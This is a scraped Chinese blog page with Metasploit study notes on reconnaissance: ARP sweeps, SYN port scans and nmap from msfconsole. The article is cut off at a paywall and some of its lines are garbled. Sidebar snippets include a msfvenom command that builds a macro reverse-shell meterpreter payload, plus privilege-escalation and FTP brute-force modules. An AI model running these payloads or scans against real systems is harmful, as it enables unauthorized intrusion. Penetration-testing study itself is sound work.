msf学习笔记(4)

最新推荐文章于 2023-07-08 17:25:54 发布
最新推荐文章于 2023-07-08 17:25:54 发布
阅读量1.1k 收藏 6
点赞数
CC 4.0 BY-SA版权
分类专栏: MSF学习笔记 文章标签: msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tianyazm/article/details/78434936
本文详细介绍了使用MSF(Metasploit Framework)进行信息收集的过程,包括nmap的各种扫描方式如ARP、端口、IPID、UDP扫描,密码嗅探,以及SMMP、SMB、SSH和FTP的扫描和枚举。此外,还提到了针对Windows系统缺失补丁的检测以及MSSQL和FTP服务的扫描和攻击手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

MSF信息收集

nmap扫描

db_nmap -sV 192.168.1.1

auxiliary扫描模块

RHOSTS <>RHOST
192.168.1.1-24 192.168.1.1/24
files:/root/ip.txt

arp扫描
msf > use auxiliary/scanner/discovery/arp_sweep 
set INTERFACE ̵ RHOSTS̵ SHOST̵ SMAC̵ THREADSҔ run
port扫描
use auxiliary/scanner/portscan/syn
set INTERFACE̵ PORTS̵ RHOSTS̵ THREADSҔ run
nmap ipid idle扫描

use
最低0.47元/天 解锁文章

200万优质内容无限畅学
MSF学习笔记(11)
Shadow 爬爬记
02-12 990
本地提权漏洞检测 meterpreter &gt; run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) &gt; set AutoRunScript migrate -n explorer.exe msf ...
msf 学习笔记(1)
Shadow 爬爬记
10-20 1390
msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库(5432接口未启动状态【netstat -pantu | grep 5432】) root@kali:~# msfdb start
MSF 4.0
化繁为简:为先,为专,为强
11-11 946
 The terms process model, phases and milestones have been broadly replaced in MSF 4.0 with new terminology of governance, tracks and checkpoints.     A track encapsulates a set of work s
MSF 4.0 and Microsoft Team Services
化繁为简:为先,为专,为强
11-11 1862
MSF 4.0 and Microsoft Team Services  http://geekswithblogs.net/cyoung/articles/63354.aspxThe forthcoming release of Visual Studio Foundation Server will include two methodology templates for the
Microsoft Solutions Framework (MSF) 4.0 相关资源
weixin_30279671的博客
08-13 232
1.相关下载 MSF for CMMI® Process Improvement(22.4 MB, 英文) http://www.microsoft.com/downloads/details.aspx?FamilyId=10B578F1-B7A4-459F-A783-04BC82CB2359&displaylang=en MSF for Agile Software Develop...
Metasploit使用笔记[msfd模块]4
weixin_34080951的博客
11-16 667
msfd模块是用来监听本机一个端口使远程主机连接上并使用msfconsole 本地主机:msfd -a HOST -p PortNum 远程主机:nc IP Port 本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/342648,如需转载请自行联系...
[-] Auxiliary failed: Msf::OptionValidateError The following options fa
lixixi
07-10 1万+
msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > set RHOSTS 192.168.229.133 RHOSTS => 192.168.229.133 msf auxiliary(smb_version) > run [-] Auxiliary failed: Msf::OptionVal
MSF学习笔记(10)
Shadow 爬爬记
12-11 748
宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果 生成后门s
掌握MSF认证:高级项目管理深度学习笔记
【描述】微软认证:高级项目管理MSF学习笔记 【标签】MSF 微软认证 ### 知识点解析 #### 微软解决方案框架(Microsoft Solutions Framework,MSFMSF 是微软提供的一套用于指导项目和团队管理、产品开发以及...
Metasploit——辅助模块(Auxiliary)
m0_62063669的博客
08-09 4003
简单网络管理协议(SNMP),由一组网络管理的标准组成,包含一个应用层协议、数据库模型和一组资源对象。/snmp/snmp_enum,如果能够获取只读(RO)或读/写(RW)权限的团体字符串,可以从中提取目标的补丁级别,运行的服务,用户名,持续运行时间,路由等信息。VNC:虚拟网络控制台,是一款优秀的远程控制工具软,基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用。在使用之前,你需要先创建一个数据库连接用于存放扫描的数据、结果,然后加载wmap插件。...
Metasploit 4.0下载地址
03-09
Metasploit 4.0下载地址,window版,最新版,资源太大,无法上传,请谅解!
渗透工具之msf
热门推荐
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
渗透测试工具MSF
2303_77223717的博客
07-08 1492
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
发现内网存活主机的各种姿势
hackzkaq的博客
04-28 1064
零基础学黑客,搜索公众号:白帽子左一 在渗透中,当我们拿下一台服务器作为跳板机进一步进行内网渗透时,往往需要通过主机存活探测和端口扫描来收集内网资产。 本文主要是讲nmap的扫描和基于msf的扫描发现内网存活主机,每一个点都尽量详细介绍。 1.基于UDP的扫描 UDP简介:UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的 上一层。 UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报 文发送之后,是无法得知其是否安全完整到达的
[总结]多种方式探测内网存活主机
guanjian_ci的博客
05-29 4697
0x01 Netbios协议探测 1.1 netbios简介 IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以使用的应用程序编程接口(API),为程序提供了请求低级服务的同一的命令集,作用是为了给局域网提供网络以及其他特殊功能。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名-——特指基于NETBIOS协议获得计算机名称——解析为相应IP地址,实现信息通讯,所以在局域网内部使用NetBIOS协议可以方便地实现消息通信及资源的共享 1.2 n
kali auxiliary扫描常用模块
weixin_43155143的博客
06-02 864
kali auxiliary扫描常用模块
metasploit - smb
Nixawk
08-15 1491
If you want to exploit smb locally, you need to modify regedit settings and reboot your computer.Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Polici
MSF 内网渗透(案例)
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
msf-ftp
西部壮仔的博客
03-16 438
use auxiliary/scanner/ftp/ftp_version 收集ftp的版本信息 use auxiliary/scanner/ftp/anonymous 判断是否可以匿名登陆 use auxiliary/scanner/ftp/ftp_login ftp账号密码破解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值